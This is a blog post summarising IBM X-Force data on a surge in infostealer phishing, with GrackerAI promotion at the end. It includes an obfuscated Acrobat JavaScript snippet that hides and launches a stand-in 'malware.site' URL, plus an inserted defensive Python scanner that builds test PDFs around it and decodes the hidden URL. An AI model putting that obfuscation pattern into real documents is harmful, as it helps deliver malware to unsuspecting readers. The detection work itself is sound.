Phishing Emails Delivering Infostealers Surge 84%

Cybersecurity researchers have documented an alarming surge in infostealer malware distribution through phishing channels, with weekly delivery volume increasing by 84% in 2024 compared to the previous year. This upward trend shows no signs of slowing, with early 2025 figures suggesting an even more dramatic 180% increase in weekly volume compared to 2023 baselines. The evolution of delivery mechanisms has played a crucial role in this proliferation of threats, as traditional malicious attachments have declined significantly.

Image: cybercriminals and credential theft (image courtesy of Help Net Security)

Infostealers are a particularly insidious class of malicious software designed to extract valuable information from compromised systems. These programs operate silently, capturing screenshots, logging keystrokes and, most critically, harvesting stored credentials from browsers, cryptocurrency wallets, and password managers. Once exfiltrated, these credentials fuel subsequent attacks: valid account compromise is now tied with exploitation of public-facing applications as the top initial access vector, each accounting for 30% of security incidents.

IBM analysts identified AgentTesla as the most prevalent infostealer distributed via phishing emails, followed by FormBook, SnakeKeylogger, and PureLogs Stealer. Dark web marketplace analysis revealed a 12% year-over-year increase in infostealer listings, indicating a thriving criminal ecosystem and the continued profitability of credential harvesting operations.

“Credential harvesting was observed in 28% of all security incidents we responded to in 2024,” noted Charles Henderson, Head of IBM X-Force. “Often, these stolen credentials allow attackers to remain undetected for extended periods as they move laterally through environments, making detection and remediation exceedingly difficult.”

PDF Obfuscation Techniques: The Hidden Danger

The shift toward PDF-based delivery mechanisms represents one of the most sophisticated evolutions in the infostealer landscape. Threat actors have embraced PDF files because the format is universally trusted and can effectively conceal malicious code. Analysis of malicious PDFs reveals that 42% used obfuscated URLs, 28% hid their URLs in PDF streams, and 7% were delivered in encrypted form with an accompanying password.

The technical sophistication of these obfuscation techniques often involves encoding malicious URLs using methods like hexadecimal representation or JavaScript obfuscation. For instance, a typical obfuscated URL might be encoded as:

var url = String.fromCharCode(104,116,116,112,115,58,47,47,109,97,108,119,97,114,101,46,115,105,116,101);
app.launchURL(url);

This code resolves to “https://malware.site” only when executed; the URL never appears as a literal string in the file, so simple pattern-based scanners that look for URLs miss it. Organizations need to implement layered defenses that extend beyond traditional email scanning solutions to combat these sophisticated threats.
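A defender-side illustration of what a layered check looks like, added here as an example and not taken from the article or from IBM: the script below statically scans a PDF for JavaScript streams (inflating FlateDecode streams, the "URL hidden in a PDF stream" case), undoes String.fromCharCode and hex/unicode escape encodings without executing any JavaScript, and reports URLs that only become visible after decoding. The PDF it scans is a constructed test input built around the article's own snippet; "malware.site" is the article's illustrative domain, and the object layout, function names and report fields are this example's assumptions.

```python
import re
import zlib

# The article's obfuscated snippet, reused as the payload of a constructed PDF.
# "malware.site" is the article's illustrative domain, not a real indicator.
OBFUSCATED_JS = (
    b"var url = String.fromCharCode(104,116,116,112,115,58,47,47,"
    b"109,97,108,119,97,114,101,46,115,105,116,101);\n"
    b"app.launchURL(url);"
)


def build_sample_pdf(compress: bool) -> bytes:
    """Build a minimal PDF whose OpenAction runs OBFUSCATED_JS (constructed test
    input). With compress=True the JS stream is FlateDecode-encoded, which is
    how a URL ends up 'hidden in a PDF stream'."""
    data = zlib.compress(OBFUSCATED_JS) if compress else OBFUSCATED_JS
    filt = b" /Filter /FlateDecode" if compress else b""
    return (
        b"%PDF-1.7\n"
        + b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
        + b"2 0 obj << /S /JavaScript /JS 3 0 R >> endobj\n"
        + b"3 0 obj << /Length " + str(len(data)).encode() + filt + b" >>\n"
        + b"stream\n" + data + b"\nendstream\nendobj\n"
        + b"%%EOF\n"
    )


# A stream object: its dictionary (no nested << >> handled here), then the body.
STREAM_RE = re.compile(rb"<<([^<]*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(\s*([\d\s,]*)\)")
HEX_ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
UNICODE_ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def extract_streams(pdf: bytes) -> list:
    """Return the decoded body of every stream object, inflating FlateDecode
    streams. A stream that fails to inflate is skipped, not fatal."""
    out = []
    for dictionary, body in STREAM_RE.findall(pdf):
        if b"/FlateDecode" in dictionary:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue
        out.append(body)
    return out


def deobfuscate(js: str) -> str:
    """Statically undo common encodings: String.fromCharCode(...) calls become
    quoted literals and \\xNN / \\uNNNN escapes become characters. Nothing is
    executed, so this is safe to run on untrusted input."""
    js = FROMCHARCODE_RE.sub(
        lambda m: '"' + "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()) + '"',
        js,
    )
    js = HEX_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    js = UNICODE_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), js)
    return js


def analyze_pdf(pdf: bytes) -> dict:
    """Scan a PDF for obfuscated JavaScript that launches a URL and report
    which URLs are only visible after decoding."""
    raw = pdf.decode("latin-1")
    report = {"streams": 0, "uses_fromcharcode": False, "launches_url": False,
              "urls": [], "hidden_urls": []}
    for body in extract_streams(pdf):
        report["streams"] += 1
        js = body.decode("latin-1")
        if FROMCHARCODE_RE.search(js):
            report["uses_fromcharcode"] = True
        decoded = deobfuscate(js)
        if "app.launchURL" in decoded:  # Acrobat JS call used in the article's snippet
            report["launches_url"] = True
        for url in URL_RE.findall(decoded):
            if url not in report["urls"]:
                report["urls"].append(url)
    # A URL absent from the raw bytes is exactly what a plain URL-pattern scan misses.
    report["hidden_urls"] = [u for u in report["urls"] if u not in raw]
    return report


if __name__ == "__main__":
    for compress in (False, True):
        label = "FlateDecode" if compress else "plain"
        print(label, analyze_pdf(build_sample_pdf(compress)))
```

Both the plain and the FlateDecode sample report the same decoded URL under hidden_urls, which is the signal worth alerting on: a URL that appears only after decoding is a stronger indicator than a URL written in the clear. Encrypted PDFs (the 7% delivered with a password) are out of reach for a static scanner like this one and need to be opened in a sandbox or blocked by policy instead.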

Image: top five infostealers seen on dark web forums (source and image courtesy of IBM)

Identity Attacks Comprise a Third of Intrusions

Threat actors ramped up credential theft over the past year, using AI-generated phishing emails and infostealer malware to improve their results. According to IBM, around 30% of intrusions last year were identity-based attacks, fueled by an 84% annual increase in the volume of emails delivering infostealers. Businesses need to shift away from ad-hoc prevention and focus on proactive measures such as modernizing authentication management and conducting real-time threat hunting.

“Cybercriminals are most often breaking in without breaking anything – capitalizing on identity gaps overflowing from complex hybrid cloud environments that offer attackers multiple access points,” said Mark Hughes, Global Managing Partner of Cybersecurity Services at IBM. This points to the critical need for organizations to enhance their cybersecurity measures, including multi-factor authentication and robust identity management systems.

Downtrend in Ransomware Incidents

Ransomware made up 28% of malware incident response cases and 11% of security cases, representing a decline over the last several years. This trend reflects an evolution in defensive tactics, such as increased collaboration with law enforcement to take down the infrastructure of prominent botnets linked to ransomware attacks. As a result of these takedowns, there has been increased diversification in the malware activity of cybercrime groups.

For organizations looking to enhance their security posture, understanding these shifting dynamics is crucial. Employing GrackerAI can help companies monitor emerging threats and produce relevant content that resonates with cybersecurity professionals and decision-makers. By automating insight generation from industry developments, GrackerAI positions itself as a solution for creating timely, targeted marketing materials.

Image: IBM X-Force Threat Index (image courtesy of PR Newswire)

AI Security Holds Steady

While large-scale attacks on AI technologies did not materialize in 2024, security researchers are racing to identify and fix vulnerabilities before cybercriminals exploit them. Issues like remote code execution vulnerabilities in frameworks for building AI agents are becoming more frequent. As AI adoption grows, so will the incentives for adversaries to develop specialized attack toolkits targeting AI.

The APAC region experienced the most attacks in 2024, accounting for 34% of all incidents investigated. Attackers frequently employed malware-ransomware and server access as their primary actions. For businesses looking to stay ahead of the curve, leveraging AI-powered solutions such as GrackerAI can enhance marketing strategies and content generation while addressing evolving cybersecurity threats and trends.

Explore our services or contact GrackerAI to transform security news into strategic content opportunities.
